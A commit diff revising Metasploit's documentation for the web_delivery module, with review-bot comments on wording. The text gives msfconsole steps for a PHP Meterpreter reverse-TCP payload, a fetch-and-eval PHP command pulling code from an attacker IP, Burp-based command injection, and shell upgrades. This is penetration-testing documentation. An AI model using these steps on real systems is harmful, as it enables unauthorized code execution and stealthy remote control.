MS-1196 Minor edits to the kb for the web_delivery module

bug/bundler_fix
tdoan-r7 2016-03-22 12:26:55 -05:00
parent 4c42a74d48
commit 7e5fced46b
1 changed files with 17 additions and 24 deletions


@ -1,31 +1,26 @@
As a web server, web_delivery provides a great way to deliver a payload during post exploitation,
with the intention to stay stealthy because the payload does not touch the disk.
As a web server, the web_delivery module provides a stealthy way to deliver a payload during post exploitation because the payload does not touch the disk.
Currently, web_delivery supports three different languages for delivery: Python, PHP, and
Powershell. You should be able to tell which one you can use based on the target environment
you are in.
For example: if you have gained access through a PHP application, then it's safe to assume you can
use PHP. If you're in a Windows server (such as Windows Server 2008), then it's probably safe to
say the target supports Powershell.
For example, if you gained access through a PHP application, it's safe to assume you can use PHP. If you're in a Windows server, such as Windows Server 2008, then it's probably safe to say the target supports Powershell.
## Verification Steps
To be able to use web_delivery, you must gain access to the target machine first, with the ability
to execute either the Python, or PHP, or Powershell interpreter.
To be able to use the web_delivery module, you must gain access to the target machine first, with the ability to execute either the Python, or PHP, or Powershell interpreter.
At that point, you would use web_delivery similar to the following example:
At that point, you would use the web_delivery module like in the following example:
1. Start msfconsole
2. Do: ```use exploit/multi/script/web_delivery```
3. Do: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options)
4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target)
5. Do: ```set LHOST IP``` (The IP the payload should connect back to)
2. Run: ```use exploit/multi/script/web_delivery```
3. Run: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options)
4. Run: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target)
5. Run: ```set LHOST IP``` (The IP the payload should connect back to)
6. Do: ```run```
7. At this point, a handler is up for that payload. And the module should instruct you to execute
a command.
8. Copy the command. Depending on your pentesting scenario, typically you can either inject the
command and get code execution, or run it from the target's shell, and get a session:
7. At this point, a handler is up for that payload, and the module should instruct you to execute a command.
8. Copy the command. Depending on your pentesting scenario, you can either inject the
command and get code execution, or run it from the target's shell and get a session:
```
msf exploit(web_delivery) > run
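Review bot: step 6 ("6. Do: run") still reads "Do:" while steps 2 to 5 in this hunk were changed to "Run:"; it is an unchanged context line here, so the list ends up mixing both verbs. Change it to "6. Run: run" in the same commit. Also, the rewritten example says a Windows Server 2008 target "probably" supports Powershell, while the Powershell section further down in this file states that Windows 7 and Windows Server 2008 R2 are the first versions to ship it by default; using "Windows Server 2008 R2" as the example keeps the two statements consistent.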
@ -46,14 +41,13 @@ php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/
**Python**
Python is a fairly popular language, especially on unix-based systems. For example, it comes with
Ubuntu Linux by default since 8.04. As well as Debian, and Mac OS X since 10.3.
Python is a fairly popular language, especially on Unix-based systems. By default, it has come with Ubuntu Linux since 8.04, as well as Debian, and Mac OS X since 10.3.
**PHP**
PHP is a fairly popular language for web servers, especially Apache.
**Powershell/win**
**Powershell/Windows**
Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2
are the first Windows versions to come with Powershell by default. Older Windows systems such as XP
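Review bot: the rewritten Python sentence is still awkward: "By default, it has come with Ubuntu Linux since 8.04, as well as Debian, and Mac OS X since 10.3" leaves the reader guessing whether "as well as Debian" is tied to the 8.04 date. Suggest "It ships by default with Ubuntu Linux since 8.04, with Debian, and with Mac OS X since 10.3." Since this hunk already renames the "**Powershell/win**" heading, it is also the natural place to use the product's own spelling, "PowerShell", in the heading and the paragraph below it.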
@ -68,16 +62,15 @@ web_delivery would work nicely for a web application with a command execution vu
One way to approach this would be:
1. Start exploit/multi/script/web_delivery
2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that
results in arbitrary code execution.
2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that results in arbitrary code execution.
3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.
**Shell upgrade**
web_delivery is also useful to upgrade a shell type payload to a meterpreter one.
web_delivery is also useful to upgrade a shell type payload to a Meterpreter one.
Here's how that can be done:
1. Start exploit/multi/script/web_delivery that generates/
2. On msfconsole, interact with the shell, and copy/pate the command.
3. You should get a meterpreter session.
2. In msfconsole, interact with the shell, and copy/paste the command.
3. You should get a Meterpreter session.
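Review bot: step 1 of the "Shell upgrade" list ("1. Start exploit/multi/script/web_delivery that generates/") is cut off mid-sentence and is left as an unchanged context line while step 2 directly below it was fixed. Either trim it to "1. Start exploit/multi/script/web_delivery." or finish the thought, since step 2 assumes the reader already has the command to paste; step 8 of the Verification Steps above describes copying that command from the module output, so a one-line pointer to it would close the gap.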